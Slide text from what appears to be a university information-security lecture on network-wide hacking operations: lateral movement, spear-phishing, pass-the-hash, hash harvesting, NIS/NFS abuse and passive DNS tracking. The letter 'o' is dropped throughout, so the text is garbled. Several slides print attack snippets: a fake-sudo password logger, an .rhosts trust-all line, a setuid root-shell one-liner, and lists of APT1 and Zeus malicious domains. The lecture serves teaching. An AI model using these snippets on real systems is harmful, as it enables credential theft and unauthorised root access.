Intrductin t Infrmatin Security Hacking Operatins nirkrak at pst.tau.ac.il Infsec15 at mdprbe.net
Hacking Operatins - Intrductin We nw mve frm discussing the act f hacking a single machine r device, t discuss the act f hacking and traversing thrugh an entire netwrk: Hw rganized netwrks are structured. Hw hackers penetrate rganized netwrks, usually administered by a single persn, r team f administratrs. Hw hackers traverse the netwrk t gain access t mre resurces and data.
Victim Netwrk Ve rti ca l Hrizntal/Lateral
First Target: Patient 0 Hackers will try t infect ne cmputer, by different methds: Chance / statistical Luck! Spear-phishing r human errr. Scial engineering Pure hacking. After infecting patient 0. Hackers can attempt t launch different types f attacks which can nw depend n the internal netwrk structure. By using infrmatin and access readily available n the hacked machine, hackers can attempt t laterally traverse the netwrk.
Spearphishing Spear phishing is an e-mail spfing fraud attempt that targets a specific rganizatin, seeking unauthrized access t cnfidential data. Spear phishing attempts are nt typically initiated by "randm hackers" but are mre likely t be cnducted by perpetratrs ut fr financial gain, trade secrets r military infrmatin. -- http://searchsecurity.techtarget.cm/definitin/spe ar-phishing
An email I received True stry: I received this email last year. Can yu spt the fail?
Netwrk-wide Users In an rganized netwrk, each user is given a single user/passwrd credential, this passwrd is used t authenticate the user against all machines in the netwrk which the user shuld have access t. Example: TAU. Yur user and passwrd is used t lgin t the *n?x machines as well as the vide website. If a cmputer used by ne f the users is cmprmised. yu can use his credentials if gained t lgin t all machines in the netwrk.
Phishing fr passwrds By lcal example.bashrc << EOF alias sud /tmp/sud.sh EOF /tmp/sud.sh << EOF #!/bin/bash ech Enter passwrd: read PASS ech $PASS > /tmp/.passwrd.lg sud $1 $2 $3 $4 $5 $6 EOF
Sniffing fr passwrds On windws and ther GUI based applicatins: key lgging is used t recrd credentials being entered. By actually sniffing the netwrk, lking fr telnet r ther unencrypted cmmunicatin ways cmmunicatin where passwrds are given in clear text frmat. Sniffing the netwrk traffic lking fr hashes which can later be cracked (Mre in next slide).
Cracking hashed passwrds Gaining rt access t /etc/shadw (previusly /etc/passwd) leads t btaining passwrd hashes Jhn the Ripper r ther passwrd brute frcing techniques can then be used t retrieve the clear text passwrd. The clear text passwrd can be used t lgin t ther cmputers. Users tend t use the same passwrd fr all cmputers and services, making it easy t gain access t ther resurces.
rlgin/rsh - histry Instead f lgging in all the time rlgin/rsh is used t authenticate a user withut the need t enter a passwrd. Once a cnnectin is received frm a trusted machine and it declares that the user remtely cnnecting is the user, the user autmatically gains remte machine access with the same credentials. Many hacking techniques emply: ech + + > ~rt/.rhsts This lets anybdy frm any hst cnnect t the cmputer. IP spfing can be used t gain remte access as well. And this pr authenticatin is still being used in sme dark crners f the wrld. NFS V < 4 has als utilizes the same bad authenticatin by nly cmparing hst/prt(using identd) t identify the user.
Dmain f cmputers
Unix NIS (Netwrk Infrmatin Service) The NIS (frmerly knwn as Yellw Pages/YP) prtcl is and ld prtcl used t sync passwrds acrss a netwrk. The NIS passwrds are used t spread credential f a netwrk f cmputers. Frm each f the servers in the netwrk access is given t a virtual directry which cntains files such as passwd / shadw, etc. By using shell: # ypcat passwd Yu can get the netwrk hashes f ALL users! In a secure netwrk scheme this des nt include the rt accunt, hwever lcal accunt access can be gained n all cmputers sharing the passwd file.
Pass the hash Passing the hash is an riginal way f authenticatin fr SSO (Single Sign On) which is easily explitable. In windws based systems, by simply passing the hash, a user is able t prve that he has the credentials needed t gain access t a resurce (such as a netwrk share). Once hackers lg in t a system, they can use lcally existing netwrk hashes t pass them t ther systems by this prcess: Gain lcal administratr privileges View lcally lgged in accunts. Impersnate a user lcally. Use regular windws peratins t access netwrk resurces. Gain mre access and run remte cde using psexec (sysinternals utility).
LSASS Slide was taking frm WCE Internals by Amplia Security
Hash harvesting On windws cmputers, hashes are saved lcally even after a lgn sessin is terminated in case access t the dmain is n lnger available. Several tls are in the wild used t d this hash harvesting, such as: WCE Windws Credential Editr Pass The Hash Tlkit. gsecdump Maybe mre. pwdump - hash dumping is als pssible lcaly by dumping the SAM file (Security Accunts Manager) WCE and its like: User PrcessReadMemry() t read the memry f LSASS fr harvesting Inject cde t implement the impersnatin f users. Side Nte cracking NTLM hashes: NTLM aka NT LanMan (Lan Manager) hashes are DES based hashes f max 14 byte passwrds: Each 7 bytes f the passwrd is hashed seperately making it easier instead f 256^14 we get 256^7 * 2. Therefre a rainbw table can be easily created.
Unix NFS (Netwrk File System) The Unix NFS cmparable t windws Sharing. Is a methd f sharing directries by allwing ther t lcally munt a remte directry as if it was their wn. As we previusly learned using u+s and +x t a file that hands us rt privileges we are able t escalate ur privileges: ech "main(){setuid(0);setgid(0);system("/bin/sh");}" > a.c gcc a a.c Miscnfigured NFS, allws munted directry t cntain suid files, therefre allwing rt n ne machine the ability t gain http://packetstrm.wwhacker.cm/mag/faith/faith8.txt
Shared binaries patching Administratrs r users share binaries n netwrk shares / NFS. (Usually installatin files). If thse netwrk shares are writable by a hacker he can mdify them and then wait fr ther users t execute them. Example at TAU: user@nva:~$ munt grep '/ type' netapp1:/vl/vl0/linux-rt/precise/cmmn/ n / type nfs (rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nlck,prt=tcp,prt=65535,time=70,retrans =3,sec=sys,lcal_lck=all,addr=132.67.192.53)
Hacking Infrastructure These types f peratins require: servers dmains certificates These things cst mney and take a lt f effrt t setup prperly
Infrastructure Examples APT1 Assciated Dmains: hugesft.rg ustvb.cm uszzcs.cm yuipcam.cm lmusic100.cm hvmetal.cm hkcastte.cm attnpwer.cm ifexcel.cm bluecate.cm bpyy.cm skyswim.net cslisten.cm bigish.net ushngkng.rg chileexe77.cm issnbgkit.net prgammerli.cm idirectech.cm phenixtvus.cm livemymsn.cm webservicesupdate.cm giftnews.rg nefastgame.net tdayusa.rg Zeus malware assciated dmains: dngen.inf fileserver03.cm frnty2073.net glwpaks.cm gushante.net hfajf1rnmzmasvuqiwdpchap.net iafnajrpgjajqkgjhaifpzvnz.net infinityslutins.name kesikelyaf.cm hidada.net Caret - Digital certificate with a fake wner Nir Krakwski @ Metapacket
Infrastructure Example - APT1 Nir Krakwski @ Metapacket
Passive DNS Research Tl
Passive DNS Security researchers have been cllecting IP-Hst pairs fr a few years nw. This is dne using instrumented prgrams installed by ISPs at their DNSs. The Hst-IP pairs can be used t back-track hackers resurces. Fr example, if hacker A uses dmain blblbfizzly.cm, we can nw blacklist it. we lk it up in passive dns t find ip pairs we find it matches the fllwing IPs: 8.8.8.8 and 8.8.4.4. We can lk up in th e same database fr pairs with 8.8.4.4 we find it matches gggfizzly.cm and bij888rcks.cm Nw withut much mre infrmatin, yu wuld educatedly guess that gggfizzly.cm is being used by the same hacker A, therfere we can blacklist it t. Virusttal.cm has a publicly query-able passive database but it is an incmplete ne.
Passive DNS
Questins?
Gd Luck in the Test! The test is hard. Yu will need t prepare a flder with this semesters material and bkmarks fr subjects! Hpefully, there will be a 3 hur rehearsal exercise befre the test. Feel free t drp by us questins and ask fr help. N hmewrk fr yu, cme back 1 year!